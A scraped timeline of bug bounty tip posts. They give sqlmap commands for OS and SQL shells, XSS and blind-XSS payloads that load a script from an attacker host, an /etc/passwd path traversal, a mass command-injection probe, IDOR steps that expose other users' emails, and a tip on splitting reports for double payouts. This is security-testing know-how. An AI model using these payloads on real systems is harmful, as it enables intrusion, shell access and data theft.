This is how I get high bugs in hack-us-h1c🧙♀️
1) google dork site:domain login
2) visit the home page
3) see the js file in the site
4) idor boom! leak email and phone
#bugbounty #bugbountytip #bugbountytips #BugBounty
Search timeline
See-Surf 🔥🔥🔥
Python based scanner to find potential SSRF parameters 🔥🔥
github.com/In3tinct/See-S
#bugbountytips #bugbountytip #bugbounty
1
59
124
Get OS Shell :
💉 sqlmap --dbms=mysql -u "http://target,com/login.php" --os-shell
Get SQL Shell :
💉 sqlmap --dbms=mysql -u "http://target,com/login.php" --sql-shell
#bugbounty #bugbountytips #CyberSecurity
19
59
Fuzz.txt 🔥🔥🔥🔥
A list of dangerous files for fuzzing
github.com/Bo0oM/fuzz.txt
#bugbountytips #bugbountytip #bugbounty
6
242
585
XSS in
Payload: lookhere');});</script><img src=x onerror=alert('XSS')>
1)the keyword “lookhere” was used to detect all the places the input was reflected
2)The rest is responsible for balancing the payload
#infosec #bugbountytips #xss
7
71
261
A POST-XSS exploitation tool.
github.com/t3l3machus/tox
#bugbounty #bugbountytips #cybersecurity #infosec
34
93
What are you missing in security tools?
#bugbounty #infosec #bugbountytips #bugbountyhunter #hacker #security #cybersecurity #hacking #hackthebox #hackerone
7
6
#LFI #P1 #bugbountytips #bugbounty
1- Go to admin. site.tld/login
2- Tried to login with wrong credentials > error
3- Send to burp repeater
4- Found new parameter filename because of error
5- tried payload
../../../../../../../../../../../../etc/passwd
6- Full LFI ✅
188
843
I wrote an Article explaining one of my interesting Vulnerabilities that I found in Apple.
ahmdhalabi.medium.com/pii-disclosure
#bugbountytips #bugbountytip #cybersecuritytips #hacker
14
180
588
Cloud Computing Notes Cheat sheet
Credit: networkwalks.com/cloud-computin
#infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cloudsecurity
78
155
great tip:
If you test a bug and its triaged dont ask for retest, you will get just 50$ and if you could bypass it dont put it as comment in same report just create new one to double bounty :)
#bugbountytips #BugBounty #bugbountytip #infosec #CyberSecurity #cybersecuritytips
1
12
Sign Up Page IDOR
1-signup
2-account email verification needed
3-the page have function to resend message to active
4-request the resent
5-check burp and see path : /resend-activation/92220261/
6-change id to see other emails
7-so this bug disclose 92220261 email
#bugbountytips
7
59
206
FINALLY! Here you go (NEW VID🚨):
youtu.be/6ffx9pYgv9E
0 to $$$$.
Finding Job to Resigining.
Part time to Full time Hunting.
Sharing some of the Biggest lessons 2 Years of this field taught me.
Hope it helps someone out :)
#BugBounty #bugbountytips #infosec
6
19
79
Fuzz.txt 🔥🔥🔥🔥
A list of dangerous files for fuzzing
github.com/Bo0oM/fuzz.txt
#bugbountytips #bugbountytip #bugbounty
1
#bugbountytips
command injection vulns
fetch all sub-domain and save it to file.txt
after use this
One command line
~ cat file.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -mr "uid=" -v -status-code
16
48
#cycatz #bugbounty #bugbountytips Exploiting SQL Injection at Authorization token #SQL
More.. bit.ly/3yXXmCQ
#AppSec #infosec #pentest #appsec #ACL #Database #securitybreach #shodan #hacking
1
13
27
Blind XSS at scale 🔥🔥🔥
cat roots.txt | waybackurls | httpx -H "User-Agent: \"><script src=$YOUR_XSS_HUNTER></script>"
And monitor your xss hunter dashboard 🔥🔥🔥
#bugbountytips #bugbountytip #bugbounty
24
191
520
I am disclosing one of my issues that i found in private program at hackerone that allowed me to view private users projects
hamzadzworm.medium.com/an-interesting
#bugbountytips #BugBounty #bugbountytip #infosec #CyberSecurity #cybersecuritytips
6
50
163